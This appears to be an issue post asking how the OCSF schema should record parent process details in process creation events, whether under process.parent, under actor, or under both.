Clarification on Proper Placement of Parent Process Details in Process Event (ACTOR vs PROCESS.PARENT)

[threatdecoder]

Description:

I have a question regarding the appropriate placement of parent process details in OCSF for process events, specifically in the case of process creation events with activity_id set to 1.

The current schema has two fields that could potentially be used to store details about the parent process:

• process.parent: As per the OCSF documentation, this field is explicitly designed to capture information about the parent process (i.e., the process that spawned the current process).

• actor: According to the description of the actor field, it represents "the actor that performed the activity on the target process. For example, the process that started a new process or injected code into another process."

Given this, there seems to be overlap between the two fields when it comes to process creation events, where the parent process can be considered both the "actor" (initiating entity) and the hierarchical parent.

Doubt/Clarification:

1. Should the parent process be stored exclusively in the process.parent field in process creation events to adhere to a more hierarchical approach, or is it acceptable to also store the parent process details in the actor field?

2. For clarity and standardization, should we exclusively reserve the actor field for other entities like code injection or external actors (e.g., a remote machine or user) that perform actions on processes?

3. If we are to store the parent process details in the actor field, would this create confusion, since the process.parent field exists for that specific relationship? Is there a scenario where both fields should contain the parent process details?